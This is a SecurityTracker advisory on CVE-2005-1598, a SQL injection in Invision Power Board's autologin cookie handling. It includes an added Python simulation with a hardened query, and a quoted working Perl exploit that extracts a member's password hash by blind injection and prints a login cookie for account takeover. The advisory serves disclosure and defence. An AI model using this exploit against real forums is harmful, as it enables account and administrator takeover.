SecurityTracker.com

SecurityTracker Archives

Category:   Application (Forum/Board/Portal)  >   Invision Power Board
Vendors:   Invision Power Services
Invision Power Board Input Validation Flaw in 'login.php' Permits SQL Injection
SecurityTracker Alert ID:  1014499
SecurityTracker URL:  http://securitytracker.com/id/1014499
CVE Reference:   CVE-2005-1598   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Jul 17 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.3.x - 2.x
Description:   Zinho from Hackers Center Security Group reported a vulnerability in Invision Power Board. A remote user can inject SQL commands.

The autologin handler in 'sources/Login.php' (reached via 'index.php?act=Login&CODE=autologin') does not properly validate the 'pass_hash' cookie value before using it in a SQL query. A remote user can supply a specially crafted cookie value to execute SQL commands on the underlying database. The supplied exploit uses a boolean-based blind injection to recover a target member's stored password hash ('password' column on 1.3.x, 'member_login_key' column on 2.x) one hexadecimal character at a time, then presents the recovered hash in the 'member_id' and 'pass_hash' cookies to log in as that member without cracking the hash. As a result, a remote user can gain administrative privileges on the target application.

hacky0u reported the exploit.

[Editor's note: It is not clear if this vulnerability is identical to the one reported in Alert ID 1013907 or a variation of that vulnerability. This has not been confirmed.]
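The following Python script is an added example, not part of this SecurityTracker entry and not code from Invision Power Services. It models the autologin cookie lookup against an in-memory SQLite table so that the injection, the blind hash extraction it enables, and a hardened version of the lookup can be run offline. The table and column names ('members', 'id', 'member_login_key') and the cookie names follow the exploit below; the exact query shape IPB used, the sample members and their hashes, and the single URL-decoding step are assumptions made for the simulation (SQLite's substr() stands in for MySQL's MID()).

```python
"""
Added example, not part of the SecurityTracker entry or of the IPB code base:
it models the autologin cookie lookup against an in-memory SQLite table so the
injection, the blind hash extraction it enables, and a hardened lookup can be
run offline. Table and column names (members, id, member_login_key) follow the
exploit; the exact query shape IPB used is an assumption.
"""
import re
import sqlite3
import urllib.parse

# Constructed sample data: 32-hex (MD5-style) login keys, as IPB 2.x stored them.
MEMBERS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "alice", "098f6bcd4621d373cade4e832627b4f6"),
]

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id INTEGER, name TEXT, member_login_key TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?, ?)", MEMBERS)
    return db


def autologin_vulnerable(db, member_id, pass_hash):
    """Assumed vulnerable lookup: PHP URL-decodes cookie values, and the script
    concatenates them straight into the query (the flaw the advisory describes)."""
    member_id = urllib.parse.unquote_plus(member_id)
    pass_hash = urllib.parse.unquote_plus(pass_hash)
    sql = ("SELECT id, name FROM members WHERE id = '%s' AND member_login_key = '%s'"
           % (member_id, pass_hash))
    return db.execute(sql).fetchone()          # (id, name) on success, None otherwise


def autologin_hardened(db, member_id, pass_hash):
    """Hardened lookup: whitelist the cookie formats (digits, 32 hex chars) and
    bind the values as parameters so they can never change the query."""
    member_id = urllib.parse.unquote_plus(member_id)
    pass_hash = urllib.parse.unquote_plus(pass_hash)
    if not member_id.isdigit() or not HEX32.match(pass_hash):
        return None
    return db.execute(
        "SELECT id, name FROM members WHERE id = ? AND member_login_key = ?",
        (int(member_id), pass_hash),
    ).fetchone()


def injected_cookie(target_id, pos, ch):
    """The exploit's pass_hash payload: '/*' comments out the closing quote.
    Single URL-encoding here because the mock sink decodes once; the original
    exploit double-encodes for IPB's cookie handling."""
    payload = "99' OR (id=%d AND substr(member_login_key,%d,1)='%s')/*" % (target_id, pos, ch)
    return urllib.parse.quote(payload)


def extract_login_key(lookup, target_id, length=32):
    """Boolean-based blind extraction: a successful autologin means the guessed
    character is right. Returns None if no character matches (not exploitable)."""
    key = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            if lookup("31337420", injected_cookie(target_id, pos, ch)) is not None:
                key += ch
                break
        else:
            return None
    return key


def demo():
    db = make_db()

    def vuln(mid, ph):
        return autologin_vulnerable(db, mid, ph)

    def hard(mid, ph):
        return autologin_hardened(db, mid, ph)

    stolen = extract_login_key(vuln, 1)          # admin's hash, no cracking needed
    replay = vuln("1", stolen)                   # log in as admin with the stolen hash
    blocked = extract_login_key(hard, 1)         # hardened lookup leaks nothing
    legit = hard("1", stolen)                    # well-formed cookies still work
    return stolen, replay, blocked, legit


if __name__ == "__main__":
    print(demo())
```

Running the script prints the recovered hash, the (id, name) row the stolen hash logs in as, None for the hardened extraction attempt, and the row a well-formed cookie still returns. The hardening step pairs format validation with parameter binding: validation alone would have blocked this payload, but binding is what guarantees a cookie value can never be interpreted as SQL, whatever the validation misses.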

Impact:   A remote user can inject SQL commands to gain administrative privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.invisionboard.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [HSC Security] Invision PowerBoard 1.3.x - 2.x Exploit and Patch


Hackers Center Security Group (http://www.hackerscenter.com/)            
Zinho's Security Advisory           

Desc: Invision PowerBoard 1.3.x - 2.x Privilege escalation through SQL injection
Risk: High


hacky0u from http://www.h4cky0u.org kindly reported to me an exploit working against 1.3.x and 2.x versions of Invision Power Board.

The vulnerability affects sources/Login.php and leads to SQL injection.

I've coded a quick fix available at 

http://www.hackerscenter.com/Archive/view.asp?id=3812


Here's the exploit code (Full credit to h4cky0u and other guys for it):

#!/usr/bin/perl -w 
################################################################## 
# This one actually works :) Just paste the outputted cookie into 
# your request header using livehttpheaders or something and you 
# will probably be logged in as that user. No need to decrypt it! 
# Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org 
################################################################## 

use strict;
use warnings;
use LWP::UserAgent; 

my $ua = LWP::UserAgent->new; 
$ua->agent("Mosiac 1.0" . $ua->agent); 

if (!$ARGV[0]) {$ARGV[0] = '';} 
if (!$ARGV[3]) {$ARGV[3] = '';} 

# The injection sits in the autologin code path of sources/Login.php
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin'; 
my $user = $ARGV[1];   # userid to jack 
my $iver = $ARGV[2];   # version 1 or 2 
my $cpre = $ARGV[3];   # cookie prefix 
my $dbug = $ARGV[4];   # debug? 

if (!$ARGV[2]) 
{ 
        print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n"; 
        exit; 
} 

# The stored hash is 32 hex characters, recovered one character at a time
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"); 

my $outputs = ''; 

# Boolean-based blind injection through the pass_hash cookie: the query only
# matches when character $i of the target's hash equals $current
for( my $i=1; $i < 33; $i++ ) 
{ 
        my $found = 0;
        for( my $j=0; $j < 16; $j++ ) 
        { 
                my $current = $charset[$j]; 
                # 1.x keeps the hash in `password`, 2.x in `member_login_key`;
                # the quote is double-encoded (%2527) to survive cookie decoding
                my $sql = ( $iver < 2 ) ?  
"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" : 
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*"; 
                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql); 
                my $res = $ua->get($path, @cookie); 

                # If we get a valid sql request then this 
                # does not appear anywhere in the sources 
                my $pattern = '<title>(.*)Log In(.*)</title>'; 

                $_ = $res->content; 

                if ($dbug) { print }; 

                if ( !(/$pattern/) ) 
                { 
                        $outputs .= $current; 
                        print "$current\n"; 
                        $found = 1;
                        last; 
                } 

        } 
  # No character matched at this position, so the injection is not working
  if ( !$found )   { print "Not Exploitable!\n"; exit;     } 
} 
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs . "\n"; 
exit; 

# www.h4cky0u.org


- - - >
::[Hackers' center]::
Tons of tools, tutorials, papers, books,
articles, exploits...
www.hackerscenter.com

	<-:[@ZINHO@]:->
 
 



Copyright 2020, SecurityGlobal.net LLC